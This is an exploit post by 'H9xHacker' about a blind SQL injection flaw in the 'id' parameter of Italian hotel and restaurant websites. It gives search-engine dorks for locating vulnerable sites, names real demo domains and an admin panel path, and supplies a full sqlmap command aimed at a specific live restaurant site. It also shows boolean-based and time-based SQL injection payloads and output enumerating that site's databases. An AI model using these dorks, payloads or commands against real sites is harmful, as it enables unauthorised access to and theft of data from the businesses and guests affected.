# Exploit Title:Italian Hotels Blind SQL Injection vulnerability # Date:30/11/2019 # Dork: inurl:camere-dettaglio.php?id= site:.it inurl:restaurant-news-detail.php?id= site:.it inurl:rooms-suites.php?id= site:.it inurl:room.php?id= site:.it inurl:rooms-suites.php?id= site:.it # Exploit Author:H9xHacker # Tested on:Linux Reverse check bing.com ip:151.11.51.124 .php?id= (There are 202 domains hosted on this server.) # Demo ristorantelaspada.it/en/restaurant-news-detail.php?id=32 lungarnovespucci50.com/en/camere-dettaglio.php?id=9 hotelbeyfin.com/de/rooms-suites.php?id=27 # Admin control panel path http://www.website.com/cms-admin/ OR http://www.website.it/cms-admin/ # Poc: sqlmap --level=5 --risk=3 --timeout=10 --threads=10 --random-agent -u 'http://ristorantelaspada.it/en/restaurant-news-detail.php?id=32' --no-cast --batch --dbs --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=32' AND 2568=2568-- AtOc Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: id=32' OR (SELECT 9574 FROM (SELECT(SLEEP(5)))kdFW)-- xPIg --- web application technology: Apache, PHP back-end DBMS: MySQL >= 5.0.12 available databases [2]: [*] information_schema [*] ristorantelaspada_it_01 ------------------------ Greets:Black Hat Hackers